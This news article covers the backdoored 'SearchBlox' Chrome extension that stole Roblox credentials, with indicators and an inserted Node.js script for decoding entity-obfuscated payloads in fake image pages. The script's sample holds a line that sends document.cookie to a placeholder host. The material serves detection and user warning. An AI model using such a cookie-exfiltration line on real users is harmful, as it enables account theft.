
A Chrome browser extension named 'SearchBlox', installed by more than 200,000 users, has been found to contain a backdoor that can steal Roblox credentials and in-game assets.

BleepingComputer has analyzed the extension code, which indicates the presence of a backdoor introduced either intentionally by its developer or after a compromise.

Chrome extension targets Roblox players

The 'SearchBlox' extensions found on the Chrome Web Store appear to be compromised, BleepingComputer has observed.

There are two search results for 'SearchBlox' on the Chrome Web Store. These extensions claim to let you "search Roblox servers for a desired player... blazingly fast," but both contained the backdoor.

The IDs of these unsafe extensions are:

  • blddohgncmehcepnokognejaaahehncd
  • ccjalhebkdogpobnbdhfpincfeohonni

Malicious SearchBlox extension on Chrome (BleepingComputer)

In the early morning hours of Wednesday, suspicions arose among Roblox community members that SearchBlox contained malware.

"Popular plug-in SearchBlox has been COMPROMISED / BACKDOORED - if you have it, your account may be at risk," tweeted RTC, an unofficial Roblox news and community account.

"Please change your passwords if you have it - and credentials, so that way your account is secure again."

We downloaded the Chrome extensions for analysis. In the first extension (blddohgncmehcepnokognejaaahehncd), installed by over 200,000 users, the backdoor sits on line 3 of the 'content.js' file:

Backdoor within Chrome extension 'SearchBlox' (BleepingComputer)

For the second extension (ccjalhebkdogpobnbdhfpincfeohonni) with just 959 downloads, the backdoor resided within the 'button.js' file.

The offending URL in either case is:

hxxps://searchblox[.]site/image.png/image.txt

As if the URL structure 'image.png/image.txt' weren't already interesting enough, the page contains HTML that pretends to display an image using an '<img>' tag, but instead carries obfuscated JavaScript that has been further encoded as HTML numeric character references (sequences built from the '&' and '#' symbols, such as '&#NNN;'):

Page pretends to contain HTML attempting to display an image (BleepingComputer)

Decoding the character references yields further obfuscated code that appears to exfiltrate Roblox credentials to another domain, releasethen.site.

Another suspicious domain in use by the extension (BleepingComputer)
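The following Node.js script is an added illustration of the pattern described above; it is not BleepingComputer's code and not the extension's real payload. It decodes HTML numeric character references and applies the heuristics the article gives for the second stage: a URL that claims to be an image, a body that is actually HTML with an '<img>' tag, a long run of '&#NNN;' entities, script-like tokens in the decoded text, and a contacted host that differs from the one serving the page. The sample response is constructed here for demonstration, and the hostnames cdn.example and collector.example are placeholders.

```javascript
// Added example, not BleepingComputer's code and not the extension's real
// payload. It decodes HTML numeric character references and applies the
// heuristics described in the article to a fetched "image" response.

// Decode &#NNN; (decimal) and &#xHH; (hex) references plus the five basic
// named entities; anything else is left untouched.
function decodeNumericEntities(text) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return text.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const isHex = body[1] === 'x' || body[1] === 'X';
      const code = parseInt(isHex ? body.slice(2) : body.slice(1), isHex ? 16 : 10);
      // Out-of-range values are not valid code points; keep the raw text.
      if (!Number.isFinite(code) || code > 0x10ffff) return match;
      return String.fromCodePoint(code);
    }
    const key = body.toLowerCase();
    return key in named ? named[key] : match;
  });
}

// Tokens that a payload hidden in a fake image page is likely to contain.
const SCRIPT_MARKERS = ['eval(', 'Function(', 'document.cookie', 'fetch(',
  'XMLHttpRequest', 'atob(', 'localStorage'];

// Heuristics: the URL claims to be an image, the body is HTML with an <img>
// tag, the body holds a long run of numeric character references, and the
// decoded text contains script markers. Hosts other than the one serving the
// page are reported separately, since the article notes a second domain.
function analyzeResponse(url, body) {
  const claimsImage = /\.(png|jpe?g|gif|webp)(\/|$|\?)/i.test(url);
  const looksLikeHtml = /<(!doctype\s+html|html|body|img)\b/i.test(body);
  const entityRuns = body.match(/(?:&#x?[0-9a-f]+;){16,}/gi) || [];
  const longestRun = entityRuns.reduce((m, r) => Math.max(m, r.split(';').length - 1), 0);
  const decoded = decodeNumericEntities(body);
  const markers = SCRIPT_MARKERS.filter((m) => decoded.includes(m));
  const hosts = [...new Set(
    (decoded.match(/https?:\/\/[a-z0-9.-]+/gi) || [])
      .map((u) => u.replace(/^https?:\/\//i, '').toLowerCase())
  )];
  const offHostDomains = hosts.filter((h) => h !== new URL(url).hostname);
  const suspicious = claimsImage && looksLikeHtml && longestRun >= 16 && markers.length > 0;
  return { claimsImage, looksLikeHtml, longestRun, markers, offHostDomains, decoded, suspicious };
}

// Constructed sample (placeholder hosts cdn.example and collector.example):
// an HTML page with an <img> tag followed by JavaScript encoded as decimal
// character references, mimicking the structure the article describes.
const HIDDEN_SCRIPT = 'fetch("https://collector.example/x?c=" + encodeURIComponent(document.cookie));';
const ENCODED = [...HIDDEN_SCRIPT].map((ch) => `&#${ch.codePointAt(0)};`).join('');
const SAMPLE_URL = 'https://cdn.example/image.png/image.txt';
const SAMPLE_BODY = `<html><body><img src="image.png">${ENCODED}</body></html>`;

const report = analyzeResponse(SAMPLE_URL, SAMPLE_BODY);
console.log(`suspicious=${report.suspicious} run=${report.longestRun} ` +
  `markers=${report.markers.join(',')} offHost=${report.offHostDomains.join(',')}`);
```

Run with `node` on a saved response body instead of SAMPLE_BODY to triage a suspect URL; the `longestRun` threshold of 16 is a tuning choice, since legitimate pages rarely carry more than a handful of consecutive numeric references.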

Of note is the fact that both 'searchblox.site' and 'releasethen.site' were registered this month and share a common web host, Hostinger.

The code also appears to survey a player's profile on Rolimons.com, a Roblox trading platform.

'SearchBlox' a repeat offender

Unfortunately, this does not appear to be the first time a malicious 'SearchBlox' extension has targeted Roblox users.

In October, Google reportedly took down another 'SearchBlox' extension that had been on the Chrome Web Store since at least June 28, 2022.

Whether the backdoor was injected into the extension after a compromise by a threat actor or introduced intentionally by the developer has yet to be authoritatively determined.

There is some speculation among Roblox community members [1, 2, 3, 4], who have noticed the inventory of user 'Unstoppablelucent', purportedly the extension's developer, multiply overnight, while Roblox user 'ccfont' was terminated today over suspicious inventory trades.

Both the extensions and the offending URLs had a clean VirusTotal reputation at the time of writing, which makes detecting these malicious extensions considerably harder.

Suffice it to say, anyone who has installed 'SearchBlox' should remove the extension immediately, clear their cookies, and change their passwords for Roblox and any other websites they logged into while the extension was installed.

BleepingComputer notified Google of the malicious extensions prior to publishing. A Google spokesperson later confirmed that the extensions were taken down and will automatically be removed from systems where they were installed.

"The identified malicious extensions are no longer available on the Chrome Web Store," Google told BleepingComputer.

"The extensions are blocklisted and will be automatically removed from any user machine that previously downloaded them."

Updates:

Nov 23, 2022 12:24 PM ET: Added statement from Google received hours after publication.

Nov 26, 2022 11:36 PM ET: Removed references to Rolimons that are not applicable.
